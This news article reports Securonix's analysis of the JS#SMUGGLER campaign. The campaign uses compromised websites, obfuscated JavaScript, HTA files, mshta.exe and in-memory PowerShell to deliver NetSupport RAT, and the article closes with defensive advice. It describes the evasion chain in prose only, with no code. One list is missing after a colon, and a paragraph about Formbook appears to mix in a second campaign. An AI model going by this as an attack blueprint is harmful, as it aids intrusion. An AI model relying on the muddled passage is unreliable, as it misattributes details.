Cybersecurity researchers have sounded the alarm about a new malware campaign called JS#SMUGGLER, which is using hacked websites to distribute the NetSupport remote access trojan (RAT). Securonix analysed the attack method, describing it as a multi-stage sequence designed to evade detection and grant attackers full control of infected systems. 

The chain begins with an obfuscated JavaScript loader that is injected into a compromised website. It then progresses to an HTML Application (HTA) file that launches encrypted PowerShell stagers through the Windows tool mshta.exe, followed by a PowerShell payload that downloads the main RAT. 

According to researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee, “NetSupport RAT enables full attacker control over the victim host, including remote desktop access, file operations, command execution, data theft and proxy capabilities.” 

There is currently no clear link to a specific threat group or country. The campaign targets enterprise users by redirecting them through infected websites, indicating broad targeting rather than a focused sector-specific effort. 

Securonix said the malware uses hidden iframes, scrambled JavaScript loaders and layered script execution. When a victim visits a compromised website, the injected script checks the device type. Mobile users are redirected to a full-screen iframe, while desktop users are sent to a second-stage malicious script. 

A tracking mechanism makes the payload fire only during the first visit to help avoid detection. The first-stage script builds the URL for the HTA payload at runtime and launches it using mshta.exe. The HTA file then runs a temporary PowerShell stager in memory. It disables visible window elements and removes itself afterwards to reduce digital traces. 

Once executed, the PowerShell payload downloads NetSupport RAT, giving the attacker remote control of the infected machine. Securonix called the campaign evidence of “a sophisticated and actively maintained malware framework.” 

The company advised defenders to use strong content security policies, script monitoring, PowerShell logging and restrictions on mshta.exe to detect similar activity. 

Additional findings show the JavaScript dropper also writes two more files to the TEMP directory: 

In the attack, the loader decrypts and runs an embedded DLL for the Formbook malware, a keylogger and an information stealer. Persistence is achieved by placing the payload in the Windows startup folder or adding entries to the Windows Registry. Securonix noted, “The threat actors combine social engineering, heavy script obfuscation and advanced .NET evasion techniques to successfully compromise targets.” 

The researchers added that reflective loading allows the final malware to run without storing it as a traditional file, which makes investigation more difficult. The disclosure follows recent research from the same firm about CHAMELEON#NET, another multi-stage malware campaign used to deliver Formbook via phishing messages. That campaign targeted the National Social Security sector and used fake webmail login pages and compressed archives to lure victims.